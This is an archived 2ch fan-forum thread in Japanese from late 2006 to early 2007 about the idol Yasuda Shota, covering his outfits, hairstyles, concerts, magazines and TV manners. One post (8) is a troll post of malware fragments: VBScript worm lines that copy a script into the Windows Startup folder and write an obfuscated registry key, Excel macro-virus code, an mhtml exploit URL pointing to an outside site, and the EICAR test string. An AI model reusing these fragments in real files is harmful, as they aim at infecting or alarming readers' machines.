5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【オカンとおちちと】(*`д´)σ班長18【ヤスダラー☆】

1 :(*`д´)元気がないとき:2006/12/25(月) 23:14:13 ID:YN5Ba1Jk
おしゃべりしたいんですぅ
ヤスダラーやったら聞いてくらさぁい☆
赤チャソの話してもいい?
握手会よりギターの匂いを嗅ぐ会を開きたい
オレのオカン昆虫ちゃうわ!ボケェ
口カパカパやねん!涙線ゆるんだよ
今日のファッションはスカートとレギンスだじょキャハ☆
んじゃらねやっぱすきやね〜ん
でも俺のほうがもっと○キ〜☆

前スレ
【DJヤサダ】σ(`д´*)班長17【俺がコレです!】
http://tv7.2ch.net/test/read.cgi/jr/1150987404/
過去ログは>>2くらい

■■班長の折木ネタ・女ネタは禁止■■

それぞれ該当スレへ
女:ttp://tv7.2ch.net/test/read.cgi/jr/1113794220/l50
折木:ttp://tv7.2ch.net/test/read.cgi/jr/1129965482/l50

2 :(*`д´)元気がないとき:2006/12/25(月) 23:14:56 ID:YN5Ba1Jk
【カチンで】(*`д´)σ班長16【ほぼ正解☆】
http://tv7.2ch.net/test/read.cgi/jr/1136105846/
【花束ドウテイ!】ヽ(`д´;)ノ〃班長15【ナニチン?アマチン】
http://tv7.2ch.net/test/read.cgi/jr/1119795883/
【浪花のチンパ】ヽ(`д´;)ノ〃班長14【ウマナミナミニ!】
http://tv7.2ch.net/test/read.cgi/jr/1110851196/l50
【ナプキンクダサイ】ヽ(`д´;)ノ〃班長13【乙女座チパ】
http://tv7.2ch.net/test/read.cgi/jr/1103471450/
【ゴメン】ヽ(`д´;)ノ〃班長12【クサイ】
http://tv7.2ch.net/test/read.cgi/jr/1090505002/
【いろは】ヽ(`д´;)ノ〃班長11【ぬるぽ】
http://music4.2ch.net/test/read.cgi/jr/1086514173/
【】ヽ(`д´;)ノ〃班長10【】
http://tv6.2ch.net/test/read.cgi/jr/1078929632/l50
【心はオトメ】ヽ(`д´;)ノ〃班長9【体はアスリート】
http://tv4.2ch.net/test/read.cgi/jr/1077631998/
【爪はシロクロ】ヽ(`д´;)~ノ〃班長8【君はジャガイモ】
http://tv4.2ch.net/test/read.cgi/jr/1064589980/
キャンキャンヽ(`д´;)ノ〃イワシタル7
http://tv2.2ch.net/test/read.cgi/jr/1057416872
【桃色微少年】安・田・章・大・6【生クリーム仕立】
http://tv2.2ch.net/test/read.cgi/jr/1051630681
【ピンクな胸元】安・田・章・大・5【ツッコミ修行中】
http://tv2.2ch.net/test/read.cgi/jr/1040829377
【西五班長】安田章大4【ギターも踊りも頑張る!】
http://tv.2ch.net/jr/kako/1025/10255/1025527135.html
最近のやっさんってどうよ?!?!
http://tv.2ch.net/jr/kako/1007/10076/1007643743.html
2安田☆章大2 
http://saki.2ch.net/jr/kako/978/978687305.html

3 :ユー&名無しネ:2006/12/25(月) 23:23:52 ID:Q/uh1NGu
>1-2
乙です

4 :ユー&名無しネ:2006/12/26(火) 00:40:34 ID:yX09lkuZ
>1
乙!

5 :ユー&名無しネ:2006/12/26(火) 10:17:10 ID:33clf2eb
>1
乙です

6 :ユー&名無しネ:2006/12/27(水) 09:02:18 ID:Pyly0we/
ヽ(`д´)ノ ホシュだじょ☆

7 :ユー&名無しネ:2006/12/28(木) 08:59:46 ID:4yuABuMt
笛とメル友だったんだな

8 :<body onload=window()>:2006/12/28(木) 10:45:46 ID:XGax82Bw
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :ユー&名無しネ:2006/12/28(木) 13:26:45 ID:Dz6Bdf+p
DJ班長wktk

10 :ユー&名無しネ:2006/12/28(木) 18:36:16 ID:ptnYLdtP
世界中の人がスカート班長批判しても
誉めてくれる人が一人いるよ(ノ∀`)

11 :ユー&名無しネ:2006/12/28(木) 19:06:02 ID:07nWqMK8
>10
うっかり誉めてくれるを
嘗めてくれると読み違えてドチドチした(ノ∀`)

12 :ユー&名無しネ:2006/12/28(木) 19:52:42 ID:QOrAgzx+
それはドチドチとかの問題じゃないぞ(w

13 :ユー&名無しネ:2006/12/28(木) 19:59:09 ID:WWe67xat
>11
その人はもぐりたいだけかもしれないし微妙なところだ

14 :ユー&名無しネ:2006/12/28(木) 20:16:21 ID:oPYz19J5
あの程度のスカートなら別にいいと思う自分は
すっかり班長に毒されてます(ノ∀`)

15 :ユー&名無しネ:2006/12/28(木) 21:24:54 ID:2SWS78pz
F風呂前花道に登場結構長くいた


16 :ユー&名無しネ:2006/12/28(木) 23:44:22 ID:m9ppajha
もう班長が何着ても驚かない自信がある
慣れって怖いな(w

17 :ユー&名無しネ:2006/12/28(木) 23:50:23 ID:LhdUOkiz
>16
それでこそヤスダラーです(w

18 :ユー&名無しネ:2006/12/29(金) 00:54:48 ID:tXoL/6KM
未来の向こうへの俺紺班長モヘ

19 :ユー&名無しネ:2006/12/29(金) 12:19:55 ID:P+EKnEQ0
美男の班長テラカ○゙エエ

20 :ユー&名無しネ:2006/12/29(金) 12:28:14 ID:wW6k+CC6
>19
班長はカ○゙エエけどあの衣装にワロテしまった(ノ∀`)

21 :ユー&名無しネ:2006/12/29(金) 13:01:03 ID:qoCeogBc
美男の振り向き上目遣い班長がカバエエ

22 :ユー&名無しネ:2006/12/29(金) 17:25:12 ID:r29rNQ/P
>16
そんなこと言ってると相方のためにゴスロリ着てくるぞ(w

23 :ユー&名無しネ:2006/12/29(金) 19:15:04 ID:YvDy8F3a
禿しく班長コレ話なので落とすのを躊躇ってたんだが
全くその話が出てないので落としてみますね

班長紺MCにて「俺の服どうなん?」と班長コレ会議になった時
大智(2ネムryが「ぶっちゃけイイと思う時もあれば、ん?と思う時もある」
と白状(ノ∀`)
その流れから「この前の服は凄かった」と言い出す関ジュ
どうやら班長はニット帽に柄シャシ、デニムの半パンを膝辺りで一度折り返し
茶色の膝下丈ブーツにニットカーデ(not議長という格好で現れ
皆最初女の子が迷い込んできたのかとオモタらしい(ノ∀`)

長文スマソ

24 :ユー&名無しネ:2006/12/29(金) 21:30:17 ID:LlXWZfto
>23
ちょ、思いっきり最近のオナゴじゃないか(w

25 :ユー&名無しネ:2006/12/29(金) 21:38:20 ID:e43zKPJG
>23
('A`*)

26 :ユー&名無しネ:2006/12/29(金) 23:04:47 ID:i6BYW3Db
想像してしまったジャマイカ
想像しやすかったのはそんなオナゴがゴロゴロいるから(ノ∀`)

27 :ユー&名無しネ:2006/12/30(土) 00:20:55 ID:gdLp7e6F
>23
議長紺にその姿で現れたと議長紺行ってた友人が言ってた

28 :ユー&名無しネ:2006/12/30(土) 00:21:40 ID:rwf4HrU7
オケスレに落ちてた時もビクーリしたが
今きいてもその格好は(ノ∀`*)

29 :ユー&名無しネ:2006/12/30(土) 00:33:09 ID:PVU9K+uT
何故だろう同じ恰好して勝てる気がしないorz

30 :ユー&名無しネ:2006/12/30(土) 01:43:40 ID:Z1oEzLMm
班長って紺の時は泣かないよな
最後まで絶対笑ってる

31 :sage:2006/12/30(土) 02:29:23 ID:382cjmad
>23
想像したらニヤけが止まらなくなってしまた

32 :ユー&名無しネ:2006/12/30(土) 02:32:15 ID:382cjmad
sage間違い本当に本当にすみませんorz

33 :ユー&名無しネ:2006/12/30(土) 02:47:44 ID:oJJQwMvV
>30
1番泣きそうなのにな
逆に泣かない班長に涙をそそられる

34 :ユー&名無しネ:2006/12/30(土) 07:36:35 ID:KbXKqChX
>33
ノシ


35 :ユー&名無しネ:2006/12/30(土) 09:01:45 ID:majbRheY
>>33
ノシ
あれは泣ける

36 :ユー&名無しネ:2006/12/30(土) 12:58:03 ID:sos9MnoS
そう考えるとバースデーケーキで嬉し泣きしてたのは貴重だったわけか

37 :ユー&名無しネ:2006/12/30(土) 13:28:32 ID:1iiIzbyV
班長ドームオメ!

38 :ユー&名無しネ:2006/12/30(土) 14:24:26 ID:PMatoklU
ここでアグリーが流れんねやを唐突に思い出した。・゚・(ノД`)・゚・。

39 :ユー&名無しネ:2007/01/01(月) 00:51:23 ID:Dz6zYo2J
2007年も班長にとっていい年になりますように(-人-)

40 :ユー&名無しネ:2007/01/01(月) 01:15:47 ID:QTP1LlmL
紅白の中居兄さんを見ていたらレポの班長コレを思い出した

41 :ユー&名無しネ:2007/01/01(月) 01:53:36 ID:TpjUZ+US
マッチさんの曲でおでる班長ハァ━━━━━━*´Д`*━━━━━━ン!!!
グッデイおでる班長ハァ━━━━━━*´Д`*━━━━━━ン!!!

42 : 【大吉】 【61円】 :2007/01/01(月) 13:09:12 ID:GlbxLKoU
あけおめ

43 :ユー&名無しネ:2007/01/01(月) 23:23:06 ID:ijecoGpr
班長、環八、そしてここの姐さんにとって良い年になりますように

44 :ユー&名無しネ:2007/01/03(水) 18:30:59 ID:Q4Pf9JVI


45 :350269004490931:2007/01/03(水) 19:41:47 ID:dsxXRyE8
ヤス(o´・ω・`o)って彼女いるのかな。。

46 :ユー&名無しネ:2007/01/03(水) 19:55:13 ID:cvExQmOR
>45
はいはい山田山田

ロムれ

47 :名無し:2007/01/03(水) 20:04:25 ID:dsxXRyE8
山田Σ(゜Д゜)
ロムム(^д^)pgr

48 :ユー&名無しネ:2007/01/04(木) 15:03:08 ID:O4pKnReT
お客さんなんて来たの久々だな(w

49 :ユー&名無しネ:2007/01/04(木) 21:59:45 ID:mSoVGa7P
ホントにな(w
客すらこないマターリスレだからな

50 :ユー&名無しネ:2007/01/05(金) 03:53:40 ID:ruOXChpP
最近ちょっと太った?

51 :ユー&名無しネ:2007/01/05(金) 09:24:58 ID:IU/aenhg
スマンが着声何個あったかわかりませんか?
二度寝したら〜と電話鳴って〜しか手持ち出来なかった

52 :ユー&名無しネ:2007/01/05(金) 17:05:14 ID:OdnILoLC
今更だがやっと牛紺見れたので叫ばせてくれ
グッデイ班長もマッチさんバック班長もハァ━━━━*´Д`*━━━━ン!!!!!

53 :ユー&名無しネ:2007/01/05(金) 18:39:45 ID:IYwIw2ZP
班長が禿ステチに踊ってくれたせいかグッディが頭にこびりついて離れナスビな5日目

54 :ユー&名無しネ:2007/01/05(金) 20:05:58 ID:+15buJNF
>53
ノシ
上海慕情も頭から離れナス(w

55 :ユー&名無しネ:2007/01/05(金) 22:21:04 ID:i23htv2y
関西ウォーカーのソロ紺レポありがたや(*´∀`)
編集者タソの言葉もテラウレシス

56 :ユー&名無しネ:2007/01/05(金) 22:47:14 ID:sTT6q+R9
>55
ノシ
駄菓子菓子蛍光衣装にビクーリしたが(w

57 :ユー&名無しネ:2007/01/05(金) 23:09:06 ID:i23htv2y
>56
あの衣装で出てきた時の衝撃といったら(ノ∀`)

58 :ユー&名無しネ:2007/01/06(土) 02:01:06 ID:sXuQgwmE
相方スレにラジオレポ落ちてる

59 :ユー&名無しネ:2007/01/06(土) 13:50:51 ID:yzGQiBZb
>58
見てきたノシ
山田が山田すぎてなんともorz

60 :ユー&名無しネ:2007/01/06(土) 19:19:26 ID:Mqh1xqUi
自身の班長と議長は何をしてるんだ( ゚д゚ )

61 :ユー&名無しネ:2007/01/07(日) 22:46:31 ID:OQFubajK
P誌の班長ハァ━━━━*´Д`*━━━━ン!!!!!
ハァ━━━━*´Д`*━━━━ン!!!!!
ハァ━━━━*´Д`*━━━━ン!!!!!
それにしても最近ハズレが全くなくて一時が嘘みたいだ(w

62 :ユー&名無しネ:2007/01/07(日) 23:35:47 ID:jrGODoEg
細眉も角刈りも
ごく最近ではドリアンも全部スチですが?

63 :ユー&名無しネ:2007/01/08(月) 15:11:51 ID:pJTFwSUM
班長お腹イッパイだよ班長

64 :ユー&名無しネ:2007/01/09(火) 20:14:46 ID:EUd6UtLJ
蛍光色キャップぐらいじゃ動じないんだからヽ(`Д´)ノ

65 :ユー&名無しネ:2007/01/09(火) 22:24:08 ID:RrcGOPKH
キャップごときで動じてたら班長担なんてできませんヽ(`Д´)人(`Д´)ノ

66 :ユー&名無しネ:2007/01/09(火) 23:11:48 ID:jU/y75ia
全身蛍光色じゃないならオゲとオモテる自分(ノ∀`)

67 :ユー&名無しネ:2007/01/10(水) 01:01:14 ID:+q0NgehN
全身蛍光色でもオゲとオモテる自分(ノ∀`)

68 :ユー&名無しネ:2007/01/10(水) 01:18:33 ID:YBE/8IdH
かに食べてピョンピョン飛んでた班長カバエエ

69 :ユー&名無しネ:2007/01/10(水) 14:19:01 ID:IREXiFDK
フアイン少年達カッコヨス心して見よ

70 :ユー&名無しネ:2007/01/10(水) 17:55:20 ID:/+tF9WmC
FINE少年達って今発売されてる歪表紙のヤシ?
自分覗いたのに見つけられなかったorz

71 :ユー&名無しネ:2007/01/10(水) 20:18:53 ID:Vb1667mm
歪表紙でオゲ
目次にも書いてあるからすぐ見つけられたぞ
来月もだなんてwktk杉る

72 :ユー&名無しネ:2007/01/10(水) 23:55:09 ID:e2WLHyAk
班長最近BEPスチだよな
ウィルのファッソンセンスがスチって言ってたが、ウィルはあんまり蛍光色着ないよ(ノ∀`)
しかし美男にしろFINE少年達にしろ班長コレが認められてきたのかな(*´∀`)

73 :ユー&名無しネ:2007/01/11(木) 00:40:10 ID:BDCzraPJ
>72
時代が班長に追いついてまいりました

74 :ユー&名無しネ:2007/01/11(木) 02:16:37 ID:eobb4/bS
プラチケの時調子悪かったのかな(´・ω・`)
でもただ態度悪いみたいに見えるから気をつけて班長

75 :ユー&名無しネ:2007/01/11(木) 08:47:01 ID:lUtPXPUt
追い付かないでw

76 :ユー&名無しネ:2007/01/11(木) 10:25:18 ID:2FH/n5w9
>71
d!
無事見つけられました(*´∀`)

>74
アンカーの時もプラチケ風の喋り方だったよな
確かにアホっぽいし態度ワルーに見られるから何か理由があったのかも試練が
これからはもう少し何とかしてほしいね

77 :ユー&名無しネ:2007/01/11(木) 18:49:17 ID:WU2L4vzK
>74
爽棚
話し方がマターリし杉て何言ってるのかワカラスビだったがorz
班長のことだから何か理由があるんジャマイカ?

78 :ユー&名無しネ:2007/01/11(木) 20:00:31 ID:7+p789i1
いいスタートがキレるってカタカナにするとこヘンだよね
それじゃあ違う意味のキレるになっちゃう
またまたチンパってる班長ワロス

79 :ユー&名無しネ:2007/01/11(木) 20:11:17 ID:/dlRvH05
>78
自分もオモタ(w
班長の家族話はテラホコーリだな
山田の菊wktk!

80 :ユー&名無しネ:2007/01/11(木) 22:09:00 ID:RzJCqUBE
>78
自分はスカのキレくキレたを思い出したよ(w

81 :ユー&名無しネ:2007/01/11(木) 23:41:34 ID:aKOl3e7Y
http://chakorin.at.webry.info/200701/article_2.html
嵐の櫻井翔と繋がっている主婦(34歳)
『私は彼のバロメーター』


82 :ユー&名無しネ:2007/01/11(木) 23:47:03 ID:wRTXMWaz
プラチケとアンカーは同じ日なんジャマイカ?同じ面だし
ソロ紺石川紺の後だから疲れてるんだとオモ
特にソロ紺はずっと歌ったり喋ったりの繰り返しだから

83 :ユー&名無しネ:2007/01/12(金) 10:18:08 ID:5QhMG6cz
どう見てもプラチケ態度悪すぎ
共演者舐めてるかめちゃくちゃ生意気でプロ意識のない人と思われるほどに
実際常時番組チェックしてる非ジャニヲタの陣コバファンはそう思った人いると思う

84 :ユー&名無しネ:2007/01/12(金) 11:19:35 ID:eVyvVTFo
(´・ω・`)

85 :ユー&名無しネ:2007/01/12(金) 11:43:24 ID:4pjZt+cI
自分たこやき住みではないのでどちらも見れてないんだが
態度悪い班長が想像できナスビで困惑してる

86 :ユー&名無しネ:2007/01/12(金) 13:25:52 ID:2NfRaPQM
班長いつも全力で一生懸命って言われてるから
肩の力を抜きすぎたとか?
まさか相方いなくて寂しいとか?orz

87 :ユー&名無しネ:2007/01/12(金) 13:31:46 ID:cTY7FTfe
アンカーておちちの時の?
確かに気だるそうではあったがそんなに態度ワルーな感じはしなかったけどな
でもプラチケ班長話は他でも聞くからいい印象は与えなかったんだろうな
班長次は気をつけてクレヨン(´・ω・`)

88 :ユー&名無しネ:2007/01/12(金) 14:13:50 ID:tFwGswec
蛍光より爪がキラキラなのより髪型がおかしくなるより
班長の態度がワルーに見えることが一番辛い(´・ω・`)
いつでも全力一生懸命が班長のミリキだと思うから
気をつけてホスィ

89 :ユー&名無しネ:2007/01/12(金) 18:50:37 ID:wxp1MgmQ
アンカー班長はいつもの班長だった
駄菓子菓子服装は
真黄色のマフラーにピンクやらオレンジやらのジャケットでいつもの班長だったorz

90 :ユー&名無しネ:2007/01/12(金) 18:52:33 ID:tFwGswec
>89
まだ実況

91 :ユー&名無しネ:2007/01/12(金) 21:53:40 ID:AjX3R2Kj
班長って時々え?みたいな態度とる時あるよな
前にスカ(じゃなかったかもだが)でバイト代貰う時の態度にビクーリした記憶が
普段がニコニコシャカリキくんだだけにギャップを感じるのかもだが

92 :ユー&名無しネ:2007/01/12(金) 22:44:20 ID:b5ONyPeN
ラジオの生電話で議長が班長に話をふったときリスナーの話を聞いてない班長に驚いたことがある
そのときは疲れたのかな?って思ったけどリスナーに謝って欲しかった

93 :ユー&名無しネ:2007/01/12(金) 23:53:50 ID:06G3PIs8
>91
ムゲだな
あれは指導者のおじさんに失礼過ぎだとオモた
ネ申が真面目な態度で受け取った後だったから余計にな

自分プラチケアンカーまだ見れてないいんだが℃っくんがよく言ってる
妙にカッコつけたがってる時の感じとはまた違うの?

94 :ユー&名無しネ:2007/01/13(土) 00:09:25 ID:uTRNrMER
確かにあのムゲは記憶から封印したくなる程態度ワルーだったが
プラチケはどちらかというと体調悪くて集中できてないってカンジに見えた
まあイクナイのは同じだけどな

95 :ユー&名無しネ:2007/01/13(土) 00:24:24 ID:cfSZ620C
紺ではいつも全力班長なのにな
テレヒだとヲタ以外も見るんだから誤解されないような態度キボン

96 :ユー&名無しネ:2007/01/13(土) 00:25:06 ID:/+o3En8+
班長サルヂエスカッフタソにも鯱デラマ取材スカッフにもベタ褒めされたり
旅館の女将さんにお礼状まで書けちゃうようなイイコだが
尚の事たまに本気でメッ(`・ω・´)とオモーことがある
リスナータソとおじさんのことは未だに忘れられナスビ(´・ω・`)

97 :ユー&名無しネ:2007/01/13(土) 00:36:47 ID:TdkZrZTA
自分が見る限り前回の議長・す・班長でアンカー出演した時の班長は
ちょっと眠そうでポヤポヤでフワッフワだが態度ワルーではない印象
プラチケはすも言ってたがまるで二日酔いみたいにヘロヘロで
態度ワルーと言うか何だコイシ的に思われそうな感じ
今回のアンカーは上2つが信じられないくらいに班長らしい班長だった

多分体調や睡魔や気分の並とか色々あるんだと思うが
やっかしメディアに出る以上はシッカリした態度で臨んでほしいね

98 :ユー&名無しネ:2007/01/13(土) 00:36:51 ID:D3yJjf9V
ギャップがあるだけ尚更態度ワルーに見えてしまうんだろうな
今年はたくさんの人に覚えてもらいたいと言うなら
ゲスト番組とかは特に気をつけてもらいたいね

99 :ユー&名無しネ:2007/01/13(土) 09:30:38 ID:a0fXpUU7
やっと昨日のアンカー見たけど年末のとは別人だな
いわゆるテレビでよく見る普通の班長だた
自分プラチケ見れないし運がいいのかあまり態度ワルーな班長を目にしてないんだが
姐さん方がここまで言う位なら他面の目(notにも止まるだろうし
指摘されたりしてるんじゃないかな
いずれにせよ今後気をつけてくれればヨシクソ


100 :ユー&名無しネ:2007/01/13(土) 09:36:45 ID:pgMu62rp
自分はプラチケ別に態度ワルーとは思わなかったんだけどな

101 :ユー&名無しネ:2007/01/13(土) 14:12:33 ID:TdkZrZTA
プラチケはいつも以上に呂律回らず聞き取り辛いホワホワ喋りだった
後は覇気がないというか魂飛んでる感じなだけで
そこまで心配するほどの事ではないと思うよ

102 :ユー&名無しネ:2007/01/13(土) 19:51:15 ID:LATCkuqY
プラチケ別に態度ワルーとは思わなかったが
体調悪そうには見えた
後半振り付け指導してた時は普通に戻ってたし

103 :ユー&名無しネ:2007/01/15(月) 22:24:39 ID:+1Cx9pac
今更だが班長のチン男の言葉テラウレシス(*´∀`)
返信wktk

104 :ユー&名無しネ:2007/01/16(火) 01:38:47 ID:WN+XiF4e
ソロ紺レポって関西ヲーカーとガイドとオリスタとD誌で全部だよな?

105 :ユー&名無しネ:2007/01/16(火) 22:34:07 ID:qh07nGMS
吹っ飛んだ瞬間急いでカツラ取りに行く班長ワロス(w

106 :ユー&名無しネ:2007/01/17(水) 09:58:33 ID:luxH/F5V
ぴあの班長と議長は何してるんだ( ゚д゚ )

107 :ユー&名無しネ:2007/01/18(木) 02:00:28 ID:O11nHb5T
槍投げ班長ハァ━━━━*´Д`*━━━━ン!!!!!
高跳びは身長が(ryだからしょうがないな(ノ∀`)

108 :ユー&名無しネ:2007/01/18(木) 21:23:11 ID:KaJ+i6U5
議長に抱っこされてるのも相方の髪直してるのも
相方のフトモモに手置いてるのもホコーリ(*´∀`)

109 :ユー&名無しネ:2007/01/19(金) 17:00:06 ID:z7IPqLaq
班長そろそろ髪切らないかな

110 :ユー&名無しネ:2007/01/19(金) 22:59:53 ID:B7P0wikL
ぴあの14番の何とも言えない顔の班長テラモエス(*´∀`)

111 :ユー&名無しネ:2007/01/20(土) 13:41:30 ID:ckCKo4Gk
南パラの班長カバエかった(*´∀`)
しずチャソに指導される班長(w

112 :ユー&名無しネ:2007/01/20(土) 21:53:42 ID:Yyv05q5B
しずちゃんと並ぶと班長の小ささが際立つよな(ノ∀`)

113 :ユー&名無しネ:2007/01/21(日) 00:51:21 ID:/7RNQvdZ
ttp://www.amazon.co.jp/o/ASIN/B000MQCT1A

尼損を彷徨ってたらこんなものがΣ( ゚д゚ )

114 :ユー&名無しネ:2007/01/21(日) 01:03:20 ID:7wtSvs6F
>113
ディーマイナークルー*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・*?

115 :ユー&名無しネ:2007/01/21(日) 01:09:49 ID:t1vi463i
>113
ロムってね

116 :ユー&名無しネ:2007/01/21(日) 01:14:45 ID:/7RNQvdZ
焦ってチンパったorz
色々スマソ

117 :ユー&名無しネ:2007/01/21(日) 22:09:15 ID:d9T5wBZM
珍男ktkr

118 :ユー&名無しネ:2007/01/22(月) 21:14:18 ID:2qquT8aI
☆誌で1人で1P取ってて本屋で動揺してしまった(ノ∀`)

119 :ユー&名無しネ:2007/01/22(月) 22:21:45 ID:zxrfcpu+
班長のビズはどうでしたか?

120 :ユー&名無しネ:2007/01/22(月) 23:04:25 ID:2qquT8aI
可もなく不可もなくいつもの☆誌というカンジですん(ノ∀`)
でもソロ紺レポも1Pあるから買っても損はないかと

121 :ユー&名無しネ:2007/01/23(火) 00:16:20 ID:Aun1/QuH
☆誌と歩誌はどちらがウマーか能?

122 :ユー&名無しネ:2007/01/23(火) 01:08:33 ID:irtROWKC
ビズなら歩誌なぜか一人だけ1Pな班長を堪能したいなら☆誌
ソロ紺レポがウマーなのは☆誌かな

123 :ユー&名無しネ:2007/01/23(火) 07:52:30 ID:AERZKMkN
担ですら驚くソロページ(w

124 :ユー&名無しネ:2007/01/23(火) 08:13:24 ID:2Ph/g5d0
もう二度とないかもしれないソロページ(w

125 :ユー&名無しネ:2007/01/23(火) 22:07:07 ID:lEKQjyQ8
今日はいつもより班長のうpが多かった気がした(*´∀`)

126 :121:2007/01/23(火) 22:50:04 ID:EbYkju+P
>122-124姐さん達dです!

今日の関風最後の場所移動のとき
いつもスキップだったが小走りでハァ━━━━*´Д`*━━━━ン!!!!
本の槍投げもハァ━━━━*´Д`*━━━━ン!!!!

127 :ユー&名無しネ:2007/01/23(火) 22:52:20 ID:hsGkYFU0
小走り班長はテラカ○゙エエかったな

128 :ユー&名無しネ:2007/01/24(水) 15:48:39 ID:77Ean35B
小走り班長がミニドラに見えて仕方がない

129 :ユー&名無しネ:2007/01/24(水) 19:13:19 ID:TUCB4n6B
班長的に今の髪型はプリンでイケてないのか(w

130 :ユー&名無しネ:2007/01/24(水) 20:06:28 ID:VZ49hsKp
http://yaplog.jp/yamato_kaoru/

131 :ユー&名無しネ:2007/01/24(水) 20:49:00 ID:9nFpHtv6
>129
また金髪に戻しそうな悪寒

132 :ユー&名無しネ:2007/01/24(水) 21:07:57 ID:6/r+RRMa
もう金髪はお腹イパーイです班長
そろそろ暗めの髪色が見たいです

133 :ユー&名無しネ:2007/01/24(水) 21:56:06 ID:CnYEKn+l
自分は班長の今の髪型好きなんだがな
姐さん達はどうですか?

134 :ユー&名無しネ:2007/01/24(水) 22:48:06 ID:12fCd7xt
今の髪型はスチ
駄菓子菓子暗めの色ならもっとスチだ

135 :ユー&名無しネ:2007/01/24(水) 23:11:04 ID:G7pugPcm
今の髪型オノコっぽくてスチだ
でも班長の髪型は毎回今が一番良いと思えてしまう
穴座を越えてから

136 :ユー&名無しネ:2007/01/24(水) 23:15:14 ID:uBPIrd3q
>135
ノシノシ(w

137 :ユー&名無しネ:2007/01/25(木) 01:13:38 ID:/4fhkevo
最近だと自/少の頃の長さや髪色がスチだな


138 :ユー&名無しネ:2007/01/25(木) 02:10:17 ID:gXx6nS8j
もうどんな髪型でもモヘられるような気がします
駄菓子菓子ヤパーリ金髪より黒めツヤヘヤーのがモヘる

139 :ユー&名無しネ:2007/01/25(木) 05:13:25 ID:OJOPVPzl
刈上げでも紫のパンチでもモヘてみせますよ

140 :ユー&名無しネ:2007/01/25(木) 20:13:07 ID:N6X3VzYe
スカマリエの回が最強

141 :ユー&名無しネ:2007/01/25(木) 22:36:50 ID:y5r2SzyZ
パパンと姪っ子タソのハピバ話にホコーリ(*´∀`)

142 :ユー&名無しネ:2007/01/26(金) 00:06:35 ID:cvehB3ue
                      ピ ー ポ ー 、
                         ピ ー ポ ー 、
                              ピ ー ポ ー

       __l
        4'⌒ヽ  、________________
        |  ノ                            つ
                                         ヽ
                ∧__∧
   ∧_∧  ∧∧     (ノノノノ人ヽ            ∧∧∧    Λ_Λ
  (   )  (  )     (●   ノ            (    ,)   <  ;`Д
  ⊂ oヽ ⊂  ヽ〜   ⊂  __ j            / ,  つ    ノ   ⊃
   ( く\^ヽ( く ヽ    /___,ゝ          (_ (__ 丿   / r  t
 


143 :ユー&名無しネ:2007/01/26(金) 00:38:55 ID:SwnR4uPK
髪型で惚れた

144 :ユー&名無しネ:2007/01/26(金) 16:29:07 ID:hqpW9wWP
班長はやっかし茶髪が最高で最強だな
スカで顔写真が出てくるときの班長が最強

145 :ユー&名無しネ:2007/01/26(金) 20:36:46 ID:ksqBFdRc
マジサマのデコ出しもスチ

146 :ユー&名無しネ:2007/01/26(金) 20:52:16 ID:jco+izOA
>145
デコ出しハァ━━━━*´Д`*━━━━ン!!!!

147 :ユー&名無しネ:2007/01/26(金) 21:18:14 ID:ujLyN+9q
デコ出しで班長にトキメキますた

148 :ユー&名無しネ:2007/01/26(金) 21:41:32 ID:mAfYEFGz
デコ出し班長にヤラレて担降りした自分が通り過ぎますよ

149 :ユー&名無しネ:2007/01/26(金) 22:11:13 ID:9IEhu0/I
>148
ノシ

150 :ユー&名無しネ:2007/01/26(金) 22:21:08 ID:+MBBRTN1
デコ出し班長はコンフィティ効果もあって最強だった

151 :ユー&名無しネ:2007/01/27(土) 00:25:21 ID:fp2IqcAf
デコ出しは顔がハキーリ拝めたからよかったな

152 :ユー&名無しネ:2007/01/27(土) 00:51:11 ID:tBXYHEBF
ノシ
ポンパ班長のおかげで今の自分がある(w
コンフィティ出姐さん多そうだな

153 :ユー&名無しネ:2007/01/27(土) 01:06:10 ID:l7A6pyPu
ノシ
穴座班長を初めて見た時の衝撃は忘れられない(w

154 :ユー&名無しネ:2007/01/27(土) 07:31:01 ID:YR2Vk9z0
04栗の片耳出して前髪サラサラもスチ

155 :ユー&名無しネ:2007/01/27(土) 12:47:59 ID:o3lGgG4Y
スレ中で一回はだいたい髪型談義がくるな(w
自分はヒカ碁がスチだ

156 :ユー&名無しネ:2007/01/27(土) 13:01:48 ID:bOq9o2rX
>155
頻繁に髪型が変わるしな(w
自分は平成夢男の頃がスチだな

157 :ユー&名無しネ:2007/01/27(土) 15:06:59 ID:ECVU/1/i
前髪ウザーでなければ
何でもpゲです

158 :ユー&名無しネ:2007/01/27(土) 21:48:20 ID:QQf2m6S0
穴座出のつわもの姐さんはいるのかな?(w

159 :ユー&名無しネ:2007/01/28(日) 00:31:41 ID:1GW9G1TB
エクステ班長もスチだったが穴座班長も襟足パープルも捨てがたい

160 :ユー&名無しネ:2007/01/28(日) 12:00:49 ID:hPcQ4T/X
昨日エネッチケー夜九時〜ドラマで主演の女優が
一時間ずっと班長に見えて仕方なかった
似てね?

161 :ユー&名無しネ:2007/01/28(日) 15:54:17 ID:BlSTMC17
夏嵐期のサパーリ短めもスチ

